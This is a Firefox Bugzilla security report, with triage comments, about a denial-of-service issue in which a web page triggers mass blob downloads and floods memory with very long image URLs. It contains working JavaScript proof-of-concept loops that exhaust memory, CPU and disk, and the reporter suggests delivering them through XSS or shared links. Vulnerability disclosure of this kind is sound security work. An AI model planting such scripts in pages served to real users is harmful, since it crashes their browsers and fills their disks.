Open Bug 1826471 Opened 1 year ago Updated 1 year ago

DoS and hard disk space exhaustion caused by multiple defects

Categories

(Firefox :: Security, defect)

Product:
Firefox
Component:
Security
Type:
defect

Tracking

()

People

(Reporter: faarari100, Unassigned)

References

(Blocks 1 open bug)

Details

(Keywords: csectype-dos, Whiteboard: [reporter-external] [client-bounty-form] [verif?])

Attachments

(13 files)

image.rar
745.72 KB, application/vnd.rar
Details
44F6080B-5193-4901-9B03-4BE28CC080B8.jpeg
16.71 KB, image/jpeg
Details
3B05806E-788B-42CF-8DDA-A69B03BE7A92.jpeg
93.51 KB, image/jpeg
Details
C5439E73-22B3-499C-A080-37D1C2DA2AE5.jpeg
111.67 KB, image/jpeg
Details
1566FF0C-8765-48B7-B487-9A61EEA9BD24.jpeg
91.75 KB, image/jpeg
Details
87CFAB12-B975-4414-8798-728375392417.jpeg
107.22 KB, image/jpeg
Details
C2A3AE05-E37B-4715-81A1-A84EC61B0E48.jpeg
114.08 KB, image/jpeg
Details
864C2DA3-2386-479A-A4AD-B30BA0BA3F8B.jpeg
81.86 KB, image/jpeg
Details
EA5B7658-7CAE-483A-B662-9BFD6C3F3100.jpeg
118.05 KB, image/jpeg
Details
2B598737-4E5E-44B6-8F68-282C59E50F34.jpeg
118.06 KB, image/jpeg
Details
836A781E-04A1-4C19-968D-E2302E6F1F63.jpeg
117.34 KB, image/jpeg
Details
6D5F1574-913E-451C-B922-DD8C0330D852.jpeg
121.82 KB, image/jpeg
Details
D96B5E53-6127-4ACC-9D07-07941ABE7C4E.jpeg
130.66 KB, image/jpeg
Details
Attached file image.rar

Summary

The browser does not confirm whether the user agrees to download multiple files when downloading multiple files.
Attackers can design malicious code, use blob to make files, and at the same time use loop functions to create many very long URLs to embed in web pages.
This can cause memory to run out and downloaded files to take up hard drive space. When memory and hard disk space are exhausted, users' browser and computer will crash.

Firefox version

111.0.1 (64-bit)

Operating system version

Windows 11 22H2

Steps to reproduce

  1. The following code will download a file with the file name PoC
var text = 'PoC'
var link = document.createElement("a");
var file = new Blob([text], { type: 'text/plain' });
link.href = URL.createObjectURL(file);
link.download = "PoC";
  1. This will download 100000 files without confirmation.
for (i = 0; i < 100000; i++) {
   var text = 'PoC'
   var link = document.createElement("a");
   var file = new Blob([text], { type: 'text/plain' });
   link.href = URL.createObjectURL(file);
   link.download = "PoC";
}
  1. The following code will generate a very long set of strings.
var text = ''
for (i = 0; i < 0xfffff; i++) {
   text += 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
}
  1. This will generate 100000 image tags, and the URL format uses the IP address in DWORD format.
for (i = 0; i < 100000; i++) {
   var img = document.createElement("img");
   img.src = 'http://0x' + text
}

  1. At this time, I checked the Process Manager of the browser and the Task Manager of Windows, and found that the memory was exhausted.

  2. If the above codes are integrated and then rewritten, the CPU, memory, and hard disk space will be exhausted at the same time. Cause system crash, and because there is no hard disk space available, the system's event log will be incomplete.

var text = ''
for (i = 0; i < 0xfffff; i++) {
   text += 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
}

var link = document.createElement("a");
var file = new Blob([text], { type: 'text/plain' });
link.href = URL.createObjectURL(file);
link.download = "PoC";

var a = [];
for (i = 0; i < 100000; i++) {
   a.push('');
}
a.forEach(() => {
   var img = document.createElement("img");
   img.src = 'http://0x' + text
   link.click();
})

  1. The computer will become slower and slower, and the user will not be able to interrupt this malicious activity.

  2. Tested with other browsers and could not reproduce this issue.

Flags: sec-bounty?

Please don't attach rar files. Can you just attach files directly to the report?

The download part of this is bug 1711049.

I would expect closing the tab to end all of this activity. Is this not the case?

Flags: needinfo?(faarari100)
Keywords: csectype-dos

Sorry, I will re-upload the attachment.

This report differs from bug 1711049 in that downloading a file is only one of the exploits. The main problem is causing hard drive space and memory exhausted.

Executing the code in steps 3 and 4 can cause the browser and the user's system to crash.

Flags: needinfo?(faarari100)

(In reply to faarari100 from comment #2)

Executing the code in steps 3 and 4 can cause the browser and the user's system to crash.

We don't consider test cases like this that create a bunch of junk in the web page to really be DoS issues. It should just cause the content process for the web page to use a lot of memory and CPU. Eventually that process will crash, but that shouldn't take down the entire browser. The browser UI should also remain fairly responsive the entire time. With process separation by origin, which we have on desktop, you can't even really interfere with web pages on origins.

Regarding the problem of causing the entire browser to close, it did occur when I was testing. This isn't just a single page crash, it slows down your entire browser and computer while loading a page containing the above code and eventually shuts down your entire browser.

I recorded a video during the test, but because the video file is too large, I had to extract a few pictures from the video. I don't know how to show the complete problem since the picture doesn't highlight the moment the browser closes and the computer slows down.
(Because the computer is getting too slow, I use the camera to record instead of screen recording.)

Of course, the code described above is just a concept. In fact, other writing methods can be used to let the garbage content occupy CPU, memory and hard disk space.

Attacker can use XSS to hide code in web page, or distribute web page links containing codes for users to visit. Regardless of the method used, whenever a user visits a web page, a large number of files are downloaded, causing the entire web page to be corrupted and the browser and computer to crash.

The severity field is not set for this bug.
:serg, could you have a look please?

For more information, please visit auto_nag documentation.

Flags: needinfo?(sgalich)
Severity: -- → S3
Flags: needinfo?(sgalich)

Unfortunately DOS bugs are outside the scope of our bug bounty program

Blocks: eviltraps
Group: firefox-core-security
Status: UNCONFIRMED → NEW
Ever confirmed: true
Flags: sec-bounty? → sec-bounty-
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: